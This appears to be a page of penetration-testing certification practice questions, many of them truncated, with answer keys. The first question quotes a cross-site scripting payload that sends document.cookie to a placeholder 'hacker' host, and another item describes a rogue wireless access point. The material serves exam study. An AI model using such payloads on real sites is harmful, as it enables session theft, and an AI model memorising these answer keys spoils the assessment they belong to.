Which of the following are the BEST methods to prevent against this type of attack?
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
Answer: C,E
Explanation: Encoding (commonly called “Output Encoding”) involves...
Which of the following would the test discover?
A penetration tester is testing a new API for the company's existing services and is preparing the following script:
Which of the following would the test discover?
A. Default web configurations
B. Open web ports on a host
C. Supported HTTP methods
D. Listening web servers in a domain
Answer:...
CORRECT TEXT
CORRECT TEXT SIMULATION
Using the output, identify potential attack vectors that should be further investigated.
Answer:
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap -sV -p 1-1023
Based on the information in the SOW, which of the following behaviors would be considered unethical?
A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO)...
Which of the following is the MINIMUM frequency to complete the scan of the system?
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?
A. Weekly
B. Monthly
C. Quarterly
D. Annually
Answer: C
Explanation: https://www.pcicomplianceguide.org/faq/#25 PCI DSS requires quarterly vulnerability/penetration...
Which of the following steps should the tester take NEXT?
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps...
Which of the following BEST describe the OWASP Top 10? (Choose two.)
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F ....
Which of the following is the reason for the error?
A penetration tester created the following script to use in an engagement:
However, the tester is receiving the following error when trying to run the script:
Which of the following is the reason for the error?
A. The sys variable was not defined.
B. The argv variable was not defined.
C...
In Python socket programming, SOCK_DGRAM type is:
In Python socket programming, SOCK_DGRAM type is:
A. reliable.
B. matrixed.
C. connectionless.
D. slower.
Answer: C
Explanation: Connectionless due to the Datagram portion mentioned, so that would mean it's using UDP.
Based on these results, which of the following attacks is MOST likely to succeed?
The following output is from reconnaissance on a public-facing banking website:
Based on these results, which of the following attacks is MOST likely to succeed?
A. A birthday attack on 64-bit ciphers (Sweet32)
B. An attack that breaks RC4 encryption
C. An attack on a session ticket extension (Ticketbleed)
D ....